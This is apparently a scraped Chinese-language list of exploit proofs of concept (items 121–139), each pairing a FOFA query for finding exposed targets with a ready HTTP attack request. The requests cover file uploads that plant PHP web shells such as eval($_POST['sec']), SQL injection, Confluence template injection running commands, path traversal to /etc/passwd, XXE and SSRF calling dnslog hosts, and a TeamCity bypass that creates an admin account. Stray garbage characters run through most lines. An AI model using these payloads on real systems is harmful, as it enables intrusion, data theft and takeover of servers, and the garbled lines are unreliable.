Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
4 J" _% m0 M( i( i9 M0 LUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
: T) ^% Y2 W& B2 P2 T) ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# R$ a4 m" s9 q, NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( ]! v) i4 C0 d# V. Q8 UAccept-Encoding: gzip, deflate/ i" {. @) `, V; Q
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
9 }, q, R' w5 _# qContent-Length: 597
$ b: e- \' V* eOrigin: https://ip:port3 _9 `6 q# s% P6 U* Q
Referer: https://ip:port/sysmanage/licence.php
, v% m& y, m& h6 M4 _9 @ N! mUpgrade-Insecure-Requests: 1
# n# o% \9 K( i& U; U& E3 @Sec-Fetch-Dest: document
& f0 i' O, N P4 I" kSec-Fetch-Mode: navigate V8 v3 g8 V0 ?: G
Sec-Fetch-Site: same-origin& I/ C; k( P: ]* s# Y. p
Sec-Fetch-User: ?1
0 y6 x: E0 u2 j6 @( T1 m4 g7 P7 r% @1 [2 xTe: trailers
2 c# {: [5 A/ i# T$ }8 iConnection: close0 _7 E2 {& g# H9 y# y
( } t# V" ^+ D8 P. w7 C/ O
-----------------------------42328904123665875270630079328# ]# G& ^. {8 v+ w. n9 D' a
Content-Disposition: form-data; name="file_upload"; filename="2.php"( V$ {6 d& Y; Z) i- f4 w
Content-Type: application/octet-stream
3 l% ^5 w8 E8 X/ s
4 r8 ` Q% s. v0 n% L6 c# v0 q<?php phpinfo()?>
8 V4 V* @5 o, w* h8 p-----------------------------42328904123665875270630079328
; k# V, `6 R% Y2 V9 q" tContent-Disposition: form-data; name="id_type"
$ ~. l5 \0 V j5 m9 _
; H% t( X6 e) @! A; f2 s' J1
8 b, Y4 K1 j' }7 ^( A9 _-----------------------------42328904123665875270630079328/ R# o, [1 w6 O- H1 W
Content-Disposition: form-data; name="1_ck"
+ J* h6 A- [8 w! t8 D2 ]; Z8 G: x5 G. W, a T0 p5 E/ b6 n
1_radhttp4 P! G. l2 A+ }7 d9 m) y
-----------------------------42328904123665875270630079328 w( u6 R+ g( g3 v8 Z4 L
Content-Disposition: form-data; name="mode"
- S, M3 S7 f) b6 A Q; d
0 ~# G- T' N2 m' ?import
7 `4 _/ b7 \' G6 e ~6 a0 B-----------------------------42328904123665875270630079328
) p' [1 ~0 l, Z$ p) F9 M5 S; \& V% ~7 k8 W- `2 L
7 _( X- p+ |' N# Y文件路径/upload/2.php y: X* N- z7 S; Y
2 V ^" q6 ^9 c; \: l4 c4 F
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
7 S& _$ S6 `" S1 S+ b0 P* _CVE-2024-1918
5 h- v% i# A7 ?8 r$ IFOFA:title="Smart管理平台". W- O# |# H5 e: v) k. V2 d
POST /useratte/userattestation.php HTTP/1.1+ e( g5 a. c" V0 F6 A
Host: 192.168.40.130:84433 n# u: X, z6 \% ^( O
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50; U" @4 x3 E% g% f
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko/ r# V6 l- w$ u. _; e/ T! ]5 Q0 B, S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ F, Q+ x" P( s- {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 K8 u; ]3 F3 g% ^* F7 w
Accept-Encoding: gzip, deflate7 i3 `% P# _( O7 p6 |1 o
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
7 m5 P7 d* C V h4 }Content-Length: 592) J: K: i2 H& r) H
Origin: https://192.168.40.130:84438 X7 M9 A4 H H6 W$ O0 d
Upgrade-Insecure-Requests: 1
' v1 I5 H$ D) f$ O4 q$ XSec-Fetch-Dest: document8 P Y3 q7 F, u( }" y0 l
Sec-Fetch-Mode: navigate
' k, u* f* A8 S: hSec-Fetch-Site: same-origin! a( h7 E: p5 {" z" P' R9 u
Sec-Fetch-User: ?1- V2 } o! i6 E J: R, Z
Te: trailers F U/ @( ^+ k3 Y: W% Z
Connection: close
% M& O8 N$ O; ^* ^0 E, | e3 @( E! m
-----------------------------42328904123665875270630079328
9 S& D- e* V" {, u( i {0 }Content-Disposition: form-data; name="web_img"; filename="1.php"
$ j2 ~( i+ k3 e- b# |Content-Type: application/octet-stream
7 d; K z3 O* F5 M; f4 g: @# r
5 j$ F i' s4 h" D6 c<?php phpinfo();?>
- L" T) }, H$ D: @& ?-----------------------------42328904123665875270630079328
- p7 A1 z# m6 m, R0 xContent-Disposition: form-data; name="id_type"5 O. ]5 Z* r% [8 L* ~+ t
6 c3 l% P6 p/ e, @2 o/ s! B1) C/ ?8 d3 s3 H! F4 X& F
-----------------------------423289041236658752706300793281 n0 k% @' [3 h D' I# z
Content-Disposition: form-data; name="1_ck"4 W) g3 j' F& c
+ \) w5 h' U; ?7 H9 i7 Z8 H1_radhttp
8 G3 J, j) P- A& U; G, d5 l1 Q& p-----------------------------423289041236658752706300793283 l1 Y/ h9 l2 D% N4 y4 q
Content-Disposition: form-data; name="hidwel"/ ?3 I$ G0 m+ P L. B: d1 |
+ e3 Q9 B' Q* u( [! B7 \9 U( {) Fset/ `- f4 g* z: U9 U/ F
-----------------------------42328904123665875270630079328
1 J' q9 o3 c% j5 C9 h, [( k. t5 I1 I, X4 R) l
: {+ J$ c, F9 ` Aboot/web/upload/weblogo/1.php; F# F3 @6 n' y; E9 w
& e, E) V/ S5 h; Z. z" t" y* G
122. 北京百绰智能s200管理平台/importexport.php sql注入
5 ]& r1 d# K# K# M' wCVE-2024-27718FOFA:title="Smart管理平台"
$ i+ l) m! M' v0 o其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
1 n' _4 T& B: ?GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
0 R- A/ T- }% x. k! F4 iHost: x.x.x.x
; ?3 w. a, G$ X8 i+ wCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc05 ~( @5 }% F! \" ?4 k4 U, [; r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
# | s# L; I8 n( O# IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& J. W' D: y* ^* `; {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. P4 s) y1 y: [
Accept-Encoding: gzip, deflate, br
+ ~% ]$ [. O/ o4 j3 ^) m0 xUpgrade-Insecure-Requests: 1
' {: _; F, H5 [$ ASec-Fetch-Dest: document
( ~6 D+ G! Q5 c5 x% s2 mSec-Fetch-Mode: navigate
+ {# c& ?; U: \) pSec-Fetch-Site: none
2 g9 O. r* ] f. K! zSec-Fetch-User: ?1' y9 S! M( s Y8 x* Y' G
Te: trailers
1 N% N" R0 n+ {7 T7 SConnection: close
% k+ J' k. Z$ _! V4 [5 I9 ]. y/ u: W* K! a) C
& q- m; l: ^; l2 ]
123. Atlassian Confluence 模板注入代码执行
9 i+ O7 F6 Z4 q0 Z& m, O; m1 M" o5 ~FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
- b& F/ n* V8 H# rPOST /template/aui/text-inline.vm HTTP/1.1! p8 X( u/ M4 T8 \+ t6 q$ T) H
Host: localhost:8090
: G Z2 \# G. c4 P7 B' hAccept-Encoding: gzip, deflate, br
( O: d7 l9 j! I' f! EAccept: */*
1 H. r0 e. q* YAccept-Language: en-US;q=0.9,en;q=0.8
7 _* H$ B) I! zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
. A$ C& C. X, b# }0 I6 uConnection: close
, s* s; ^8 X0 n$ E6 U( I) H) h# xContent-Type: application/x-www-form-urlencoded
6 @5 s8 d& R: Q9 s; c& a: v; u
- Z4 J; i0 H9 Q# b, U: J: R, olabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
: n3 j2 n; i) U! l- i6 ^
# L6 z/ d5 t& T8 J" K
R1 Z8 e4 K/ N124. 湖南建研工程质量检测系统任意文件上传
1 c1 H) R7 W, v4 A2 \# XFOFA:body="/Content/Theme/Standard/webSite/login.css"
2 {* U c6 `9 sPOST /Scripts/admintool?type=updatefile HTTP/1.1
: u8 M( g+ J" V, `+ KHost: 192.168.40.130:8282
9 `; S/ \9 ^' D' |0 D( t cUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36$ C# J. I+ s3 Y F @% y+ d8 ?
Content-Length: 72
+ L; o( H3 X* U) DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' k0 F/ p5 m5 P4 i, t
Accept-Encoding: gzip, deflate, br( G$ d' C% p' p# V2 Z0 s$ X# l1 p5 f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; ~4 f# J: ~+ E
Connection: close
* l- N1 e. z" g4 gContent-Type: application/x-www-form-urlencoded
2 L6 ]0 Y8 X) \4 g4 u/ p+ E% Q/ W: I/ w) r8 i" g2 E( ^
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
0 I- [+ v6 A: T$ ]- \7 C- B1 w' a
( j: H( s4 F+ i% Ahttp://192.168.40.130:8282/Scripts/abcgcg.aspx- M8 x3 z" k+ T
' F8 z' N6 O4 P- v& M' @- u/ q8 `125. ConnectWise ScreenConnect身份验证绕过
% Y) p5 y" @# H% jCVE-2024-1709: }9 K+ w% ?1 J3 d5 d
FOFA:icon_hash="-82958153"+ L: p. K; K- n$ p. @5 F# Q: _
https://github.com/watchtowrlabs ... bypass-add-user-poc1 ~& {9 F% l( g/ N: i1 y
% g2 C) f* l$ l! d" a& h' X! Z" s" n% k
使用方法
0 k+ ?1 d' l. D* H% Z) Ypython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
, n# q; \5 ^) B* H6 j% o
5 {9 Z. g X; @1 A$ f! O7 {
4 w1 E6 F# K F0 e5 u创建好用户后直接登录后台,可以执行系统命令。+ a% c$ I7 \/ i& a0 A
) M9 }) i6 v' c$ ^126. Aiohttp 路径遍历$ W( H/ n- M$ x& |1 x
FOFA:title=="ComfyUI"
+ [1 O8 a G( E% ^& q0 `/ r9 o$ IGET /static/../../../../../etc/passwd HTTP/1.1
8 j: P7 u9 M3 U5 H2 _+ QHost: x.x.x.x
- u! C X& H& W' U7 F" {& M1 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.361 ]1 R9 o( v( `
Connection: close
& ~& N7 W# [0 g: aAccept: */*5 k9 h/ N8 N: d+ E9 z
Accept-Language: en
# S2 i5 z2 Z- t8 T( E: c+ TAccept-Encoding: gzip6 C& i9 L* \/ r3 q- R: [' Q& e
1 o* z' W* m+ o: ]; U
% m5 c% v$ E* o; ]9 j8 K127. 广联达Linkworks DataExchange.ashx XXE9 `' q% D7 l$ U; e1 [) N, ?4 G
FOFA:body="Services/Identification/login.ashx"
, t% o- f% G" b- u& @POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
1 _. ^. L" [9 Q) ]$ |Host: 192.168.40.130:8888
- b5 G1 [2 ~$ IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36* G$ m, A0 L4 U* @7 v1 H6 Q
Content-Length: 415
( G0 ^8 `! f" K# HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
]( F# S2 F1 R* e' yAccept-Encoding: gzip, deflate
/ s& m+ m- {1 d, H/ x- {Accept-Language: zh-CN,zh;q=0.9' f! M4 d, Y; p6 ~6 q% v
Connection: close5 ~# C/ @4 K* {9 f1 m8 B9 R( T0 F: q
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0" ~0 f, v" G4 [+ L
Purpose: prefetch2 \3 |8 v' I' U1 F1 c) g, ]9 k
Sec-Purpose: prefetch;prerender
1 ^, C/ D8 P. `- t1 o3 z% d% a; c7 y+ x8 @
------WebKitFormBoundaryJGgV5l5ta05yAIe0
- J3 W! s( b1 J# u0 NContent-Disposition: form-data;name="SystemName"
$ I% A5 r: g; Z' p0 {
- P! C, G9 @6 Y6 x+ NBIM
4 h: `' Q' a7 y% n- S# b: h------WebKitFormBoundaryJGgV5l5ta05yAIe0
- |, U) \$ W& [' [$ d* GContent-Disposition: form-data;name="Params"
1 w& }5 L5 P0 h" y FContent-Type: text/plain' d! V- F7 R7 \8 k' T+ n
J3 ?; @8 j' y) {2 c- ^<?xml version="1.0" encoding="UTF-8"?>
- g' U! I S$ @. J" N; _6 B: \" B<!DOCTYPE test [1 Y0 {1 ~5 S1 k( ^5 B) ?" U1 k
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">4 V, V- o7 \8 }8 h$ l7 M
]
# i8 q- i& N% ^% C7 Z! x6 q>
- X' [/ l# x# M$ I0 _0 f<test>&t;</test>6 _7 [/ v3 q0 |9 u* I8 D2 t
------WebKitFormBoundaryJGgV5l5ta05yAIe0--( i O2 _1 B# B/ J+ d3 V
8 B% i* n0 A- s9 g1 c) S& w% U
( _) g$ H3 L# D- e
6 G2 n4 Q' \5 @& g128. Adobe ColdFusion 反序列化* T! _6 M& Q' K9 Y0 p2 Y
CVE-2023-38203* a3 ?1 w6 Z2 ]- L+ M
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)- j' B) b7 Y3 C
FOFA:app="Adobe-ColdFusion"
8 O z* R" J. l$ GPAYLOAD
" i1 o% z/ v3 e$ R5 C) B8 R& ~: T$ g
129. Adobe ColdFusion 任意文件读取
/ `) X1 O1 w) F, P$ ?7 x. ACVE-2024-207675 ?& K- I: z5 n; M. e: u, o8 D
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
1 K# A2 [- n! j! g; G7 `第一步,获取uuid
7 |6 X( E- Y4 I$ {3 oGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.14 V% G- @+ r! A! x# M' ? Y+ S
Host: x.x.x.x
2 M' g3 Z. {( i: `6 nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36- ]0 p1 P9 ?, b$ l
Accept: */*
# i% s6 C. p8 w8 o1 U3 WAccept-Encoding: gzip, deflate
" R' _+ o: b, c5 RConnection: close
& e+ U. U) W$ a! I1 O3 P6 G+ H
3 }! D1 K" y0 w2 l& T
; z! K- b- L4 n* W5 H第二步,读取/etc/passwd文件4 L0 s) r, ?3 L$ V5 }" }
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.14 g# m/ M( o6 v# R9 T# z) _7 z
Host: x.x.x.x
$ a' R6 K+ d* {3 `9 |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
) f) E* [; e+ h! P! T2 F4 JAccept: */*9 V. r& ^/ c. `) N
Accept-Encoding: gzip, deflate2 t$ r* d4 j/ P
Connection: close
' X% O1 J, I7 S; i* n) }" _/ Buuid: 85f60018-a654-4410-a783-f81cbd5000b9
- ^' i! ^6 ]/ t6 C
& G! o: v1 p8 \# \$ n9 Z1 Z# N$ t9 M1 Y. P
130. Laykefu客服系统任意文件上传
$ S8 [( ?: L* ~* i- [0 b5 g9 pFOFA:icon_hash="-334624619"
7 Q: I3 _7 |( [0 J' C& Y& o$ D2 c6 CPOST /admin/users/upavatar.html HTTP/1.1' q. S: G$ e2 Y# u1 \& ?
Host: 127.0.0.1! i+ d& @; @: C6 B% t. S# U# ?
Accept: application/json, text/javascript, */*; q=0.016 w2 U" m0 P) g+ P, w, R+ L" `
X-Requested-With: XMLHttpRequest5 ^ H; c, i2 V& S, M( I
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26: }5 ^, M2 m. Q1 B" e$ p
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR4 F3 D+ H8 S& }4 \; F7 M. ^
Accept-Encoding: gzip, deflate8 K- Z% i% a6 x" Y
Accept-Language: zh-CN,zh;q=0.96 f6 u6 M( S* L' c% O. _
Cookie: user_name=1; user_id=3
& B# ]6 V+ O# OConnection: close
2 T, T) @( ?, K& t7 J; ^
1 _, Q1 F2 i# |: }0 g------WebKitFormBoundary3OCVBiwBVsNuB2kR
9 |: ~) I U1 j! @1 @4 wContent-Disposition: form-data; name="file"; filename="1.php"
# }1 f' X, s5 w9 b$ g0 f) U( }Content-Type: image/png1 ?$ a/ }5 q4 B3 \) }, u' _* c
r+ O# Q. c' a' |( U8 w
<?php phpinfo();@eval($_POST['sec']);?>8 ]' K" Q% e2 b6 v- g& ]! g
------WebKitFormBoundary3OCVBiwBVsNuB2kR--) @- ^# H" S% I$ V I" w4 x- t: r% E
; `: ~, i! q3 i: V+ ?/ o. F
. L6 k9 h& _6 n# |- C1 Q9 `131. Mini-Tmall <=20231017 SQL注入
, C, K. A& k( mFOFA:icon_hash="-2087517259"
. e% ^3 O: C9 D. f9 o$ o* w4 x3 g后台地址:http://localhost:8080/tmall/admin
% g! B0 y2 [1 E& T0 q% x0 \http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
2 G4 n4 S. k6 u# W! G8 Z, _/ r1 y
0 O( Q6 k" ?- p4 F7 o132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过7 b+ N. U- H' p
CVE-2024-27198- ^. i6 ]: v8 _( x5 a
FOFA:body="Log in to TeamCity"
9 @6 ^0 Q; ]7 q* x9 TPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
. u1 \) n* M X! U# ]Host: 192.168.40.130:8111( c8 s- A% e- t. p3 h& a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
- R2 o. y q7 r4 v( N) s8 H0 QAccept: */*
# J& q; v0 y& M) _5 z, lContent-Type: application/json
\5 C' q' h0 ?6 j- q/ k" {Accept-Encoding: gzip, deflate
2 v k% T% x* e7 l8 S+ N( [
' J5 X- B) e# ~! f7 ^{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}6 B" `6 k0 C* q! ]0 W9 \1 O2 O
; c4 i; g. R5 V( W+ n, T' J: y
6 [1 {: B% b1 s8 R9 t, Y. G( I# oCVE-2024-27199
4 i$ p+ Y% _( t+ ]( c- d/res/../admin/diagnostic.jsp
5 }4 R9 ~: }" o2 u1 ^/.well-known/acme-challenge/../../admin/diagnostic.jsp
- L: R+ q' r! F9 _* ~/update/../admin/diagnostic.jsp, D* R3 {9 S8 Y% x- a
# L7 [' ]8 c$ |! ?3 u
2 z1 n6 T$ n) r1 o. jCVE-2024-27198-RCE.py
6 L% t+ |# K, \2 F4 a2 i7 i7 z) ^, D7 {# s6 d# y2 L9 ^
133. H5 云商城 file.php 文件上传
# s; q; ]: J, f; @FOFA:body="/public/qbsp.php"
q. x7 o$ |0 s& m# Q- `0 q- h/ [POST /admin/commodtiy/file.php?upload=1 HTTP/1.1: `3 f1 \2 D, W
Host: your-ip
' ]: X! K: D4 u8 x6 x4 K% x' j8 cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36- Z0 h+ [7 H8 S1 [
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx. ^* D/ W! I( U8 _) J3 N
, ]% {( _6 S4 w9 k; X- W/ d }& y5 o------WebKitFormBoundaryFQqYtrIWb8iBxUCx
3 A+ N; J' X3 `# OContent-Disposition: form-data; name="file"; filename="rce.php". M" j. i7 u' M/ W4 g5 a% M3 u
Content-Type: application/octet-stream9 s+ m( R) F3 |. x$ b, `8 k7 }
" l# F1 [. @7 M<?php system("cat /etc/passwd");unlink(__FILE__);?>- e) _3 i9 s: R. c7 W
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--; E2 B7 t, }; w3 c& K: P& z
, M- b4 _2 `( l: z6 I' ^4 K
( h$ U. a8 `- K
" O: ]; b6 x' Y6 R- v" v8 t134. 网康NS-ASG应用安全网关index.php sql注入
# s( U" ^/ n! l7 rCVE-2024-2330
8 [0 F: X5 R% m1 M, F( HNetentsec NS-ASG Application Security Gateway 6.3版本$ |5 D0 X- n/ \9 m0 h! q
FOFA:app="网康科技-NS-ASG安全网关", @; [0 q4 n, A; d
POST /protocol/index.php HTTP/1.1
& w) I4 P9 W6 q% w/ U/ t$ qHost: x.x.x.x1 _. i& ^( z* U/ j I
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
2 r& F, h# I9 ]/ @6 {0 Z+ t+ WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.01 X P8 I9 j6 u+ U
Accept: */*% [& b* r/ W0 e0 t9 f! N9 f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! d: b( f* t; |" t# y( C
Accept-Encoding: gzip, deflate, M& U- b u- r' D8 g& t
Sec-Fetch-Dest: empty1 ]8 s1 q0 |7 E7 |) i) l: |9 }8 t
Sec-Fetch-Mode: cors R( Z5 |$ s% G% r
Sec-Fetch-Site: same-origin
4 i. ]; G6 n/ ^: M0 YTe: trailers
3 s3 c: Z( V! yConnection: close6 A* G+ D+ a! B* n& ~4 ^& m
Content-Type: application/x-www-form-urlencoded% C5 p5 H5 l0 N; j5 X% U
Content-Length: 263" e, d* V1 o' c) U6 P
- D, u2 i! h! _0 O- G5 i& O
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
* ]% b( y$ O K2 B2 ?
: h3 T4 ?" ?; H/ @5 z& `; L0 I
+ i5 \8 E: [2 h; ` S" j; ]0 K135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入( k( ~, ?$ ]0 V: H. a. W: p
CVE-2024-2022" D" K; _' h$ @
Netentsec NS-ASG Application Security Gateway 6.3版本* }9 |' p, |- Z" v! q" T2 n- [* S0 ~
FOFA:app="网康科技-NS-ASG安全网关"5 x5 X- t; p$ a, P; T; w3 m- v
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1/ H6 z. d: M' N
Host: x.x.x.x
l% X9 _) p( X/ ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
7 Y& g, t. s# q+ EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 T1 d- e$ K/ `. z) N& vAccept-Encoding: gzip, deflate% Y$ ]1 f+ u8 G7 n
Accept-Language: zh-CN,zh;q=0.9
" B6 @7 `, w8 ]* q& a0 kConnection: close# o* s M+ T" g5 K0 l9 S
) f! M# |+ n4 K& f7 i+ \! T% I
: z0 R$ ]/ X, s136. NextChat cors SSRF+ y$ `3 a& E* z5 n. R
CVE-2023-49785 {: ?5 K9 A1 B0 X4 x
FOFA:title="NextChat", T6 F$ c) K5 T! B7 V; c
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.12 I5 E+ L# j9 m& ]
Host: x.x.x.x:10000 }) G7 X4 u$ w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36/ c3 b2 h# n- i5 [9 M( }% b
Connection: close
* c7 s0 N2 g8 C# @Accept: */*
/ K( r! O7 o, l- y( C+ I6 I. g2 zAccept-Language: en& l1 } K8 j+ m% n4 l+ D Z
Accept-Encoding: gzip$ f j+ W% U3 @1 M5 Z5 M# C
. s) n1 L+ \+ z7 { |3 S" Q
, O6 b' ~# W$ u- _) }# O137. 福建科立迅通信指挥调度平台down_file.php sql注入; T j' P0 D: s4 Z5 @4 e3 V( Q
CVE-2024-2620
# o4 `$ a* ] p) K+ NFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"% |% R2 Y8 k& n) ], V9 h: y8 x2 e
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.11 I# L" q3 f0 t/ W$ ^# m8 H
Host: x.x.x.x
d! b3 Y) Q6 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.05 i0 B3 a, U6 l; s9 h/ b+ V6 F- C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& j, E0 F. g9 A" D8 R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 ]0 h/ I$ p7 F' W1 Z2 MAccept-Encoding: gzip, deflate, br9 ^' R( f5 r! P
Connection: close! g, L8 M2 }+ l0 |8 ^
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
% @# m1 \! c* q2 w5 {Upgrade-Insecure-Requests: 13 \6 m7 _2 v8 R! o
+ p6 c6 h" U# O, k$ X& i; ^7 _ S. F4 S5 a
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入, N4 G1 J1 N5 N3 A& K c4 d
CVE-2024-26212 e* b! D8 p0 D0 z3 C* U
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
7 c' ^# k P5 BGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.12 p# x% S# W8 o
Host: x.x.x.x
( e4 f- q4 p/ n2 V3 k. AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! `* w( O: v* `) \0 W3 G) y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) h8 K0 S; P6 D# b8 G! `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% ~; j# `; D1 m% VAccept-Encoding: gzip, deflate, br
4 P2 s5 T+ l$ A7 K: \ } IConnection: close
1 W" I9 s7 s( M" h& pUpgrade-Insecure-Requests: 1$ U) N& @, t- X
% E8 Q: K' d" I9 Q3 H3 Z- q) z. }6 Y" h
139. 福建科立讯通信指挥调度平台editemedia.php sql注入( W2 f3 i/ w3 ^8 r( `0 f4 _/ P1 A& y
CVE-2024-2622- g! y: S+ D9 z
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
. x1 g6 ~, \; f) ~6 Z# a9 lGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.11 G8 d' W$ d1 B& U' n- d8 t. q1 ~
Host: x.x.x.x3 K; l% c# v9 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.01 l' X9 n E0 Z5 S1 Z* M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% n5 c9 c. ?3 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 B) L; _2 H' [" I0 v
Accept-Encoding: gzip, deflate, br
. F- q( d7 w6 [8 z2 \9 `9 yConnection: close
